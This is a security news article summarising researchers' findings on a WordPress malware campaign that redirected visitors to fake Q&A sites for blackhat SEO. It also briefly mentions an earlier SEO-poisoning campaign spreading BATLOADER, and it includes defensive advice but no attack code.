A new malicious campaign against WordPress websites has been detected.
Malware Campaign against WordPress Sites: 15,000 Sites Affected
Security researchers have detected “a surge in WordPress malware redirecting website visitors to fake Q&A sites.” The campaign is an example of blackhat SEO and malicious SEO redirects aiming to increase the authority of hackers’ sites for search engines. Discovered by Sucuri researchers, the campaign has affected approximately 15,000 websites, with malicious redirects detected on more than 2,500 websites between September and October, 2022. Affected sites contain “a great deal of infected files – nearly 20,000 detections in total,” according to Sucuri’s own findings.
The researchers note that the campaign is rather unusual in that the hackers are promoting a small number of fake low quality Q&A sites. Another curious fact about the campaign is the large number of infected files detected on the websites. Usually, their number is rather small to decrease the detection rate. WordPress core files are mostly affected, as well as .php files created by other unrelated malware campaigns.
The top 10 most commonly infected files include the following:
It is also noteworthy that, because the malware tampers with core WordPress operations, the redirects it triggers can execute “in the browsers of whomever visits the site.” To avoid being noticed, redirects won’t occur in case wordpress_logged_in cookie is present, or if the current page is wp-login.php.
What Is the Purpose of This Malicious BlackHat SEO Campaign?
Since this is an example of blackhat SEO, the attackers’ sole purpose is increasing traffic to the above-mentioned, low-quality Q&A sites and increasing these sites’ authority for Google. This is accomplished by initiating a redirect to a PNG image hosted on the ois[.]is domain. Instead of loading an image, it takes the website visitor to a Google search result of a malicious Q&A domain.
It is yet to be relieved how the initial infection of WordPress sites happens. So far, the researchers haven’t noticed WordPress plugin vulnerabilities being leveraged in the campaign. The attackers could be using brute force attacks against WordPress administrator accounts. To avoid these from happening, it is advisory to enable two-factor authentication and make sure your software is updated.
Performing a core file integrity check is another step that the researchers recommend. “If you can identify any files with this malware make sure to query your file system for any other files containing the same injection; there are almost certainly going to be quite a few others,” Sucuri said.
Earlier this year, researchers uncovered another malicious campaign that used SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers used malicious sites packed with keywords of popular software products, and used search engine optimization poisoning to make them show up higher in search results. Mandiant researchers also observed a clever evasion technique which relied on mshta.exe, a Windows-native utility designed to execute Microsoft HTML Application files (HTA).